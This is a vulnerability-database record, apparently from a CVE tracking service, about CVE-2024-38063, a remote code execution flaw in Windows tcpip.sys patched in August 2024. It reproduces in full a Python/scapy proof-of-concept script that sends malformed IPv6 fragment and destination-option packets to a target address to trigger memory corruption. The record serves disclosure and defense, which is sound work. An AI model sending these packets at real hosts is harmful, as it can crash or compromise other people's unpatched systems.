{"uuid": "4be2fca3-59f3-437e-a4db-7c0b2f8acb81", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "title": "Proof of Concept for CVE-2024-38063 - Remote Code Execution Vulnerability in tcpip.sys", "description": "[Proof of Concept for CVE-2024-38063](https://github.com/ynwarcs/CVE-2024-38063), an RCE in tcpip.sys patched on August 13th 2024.\n\nAn [analysis of the vulnerability](https://malwaretech.com/2024/08/exploiting-CVE-2024-38063.html) published on August 27, 2024 by Marcus Hutchins.\n\nPoC published on GitHub on August 24, 2024.\n\n### Implementation\n\nImplementation details are available on [GitHub](https://github.com/ynwarcs/CVE-2024-38063/blob/main/script/cve-2024-38063.py).\n\n```python\nfrom scapy.all import *\n\niface=''\nip_addr=''\nmac_addr=''\nnum_tries=20\nnum_batches=20\n\ndef get_packets_with_mac(i):\n    frag_id = 0xdebac1e + i\n    first = Ether(dst=mac_addr) / IPv6(fl=1, hlim=64+i, dst=ip_addr) / IPv6ExtHdrDestOpt(options=[PadN(otype=0x81, optdata='a'*3)])\n    second = Ether(dst=mac_addr) / IPv6(fl=1, hlim=64+i, dst=ip_addr) / IPv6ExtHdrFragment(id=frag_id, m = 1, offset = 0) / 'aaaaaaaa'\n    third = Ether(dst=mac_addr) / IPv6(fl=1, hlim=64+i, dst=ip_addr) / IPv6ExtHdrFragment(id=frag_id, m = 0, offset = 1)\n    return [first, second, third]\n\ndef get_packets(i):\n    if mac_addr != '':\n        return get_packets_with_mac(i)\n    frag_id = 0xdebac1e + i\n    first = IPv6(fl=1, hlim=64+i, dst=ip_addr) / IPv6ExtHdrDestOpt(options=[PadN(otype=0x81, optdata='a'*3)])\n    second = IPv6(fl=1, hlim=64+i, dst=ip_addr) / IPv6ExtHdrFragment(id=frag_id, m = 1, offset = 0) / 'aaaaaaaa'\n    third = IPv6(fl=1, hlim=64+i, dst=ip_addr) / IPv6ExtHdrFragment(id=frag_id, m = 0, offset = 1)\n    return [first, second, third]\n\nfinal_ps = []\nfor _ in range(num_batches):\n    for i in range(num_tries):\n        final_ps += get_packets(i) + get_packets(i)\n\nprint(\"Sending packets\")\nif mac_addr != '':\n    sendp(final_ps, iface)\nelse:\n    send(final_ps, iface)\n\nfor i in range(60):\n    print(f\"Memory corruption will be triggered in {60-i} seconds\", end='\\r')\n    time.sleep(1)\nprint(\"\")\n```", "description_format": "markdown", "vulnerability": "CVE-2024-38063", "creation_timestamp": "2024-08-28T08:55:21.234923+00:00", "timestamp": "2024-08-30T12:36:21.633241+00:00", "related_vulnerabilities": [], "meta": [{"tags": ["vulnerability:exploitability=documented", "vulnerability:information=PoC"]}], "author": {"login": "cedric", "name": "C\u00e9dric Bonhomme", "uuid": "af0120d0-3dac-4a6a-974b-a9f33d2a9846"}}
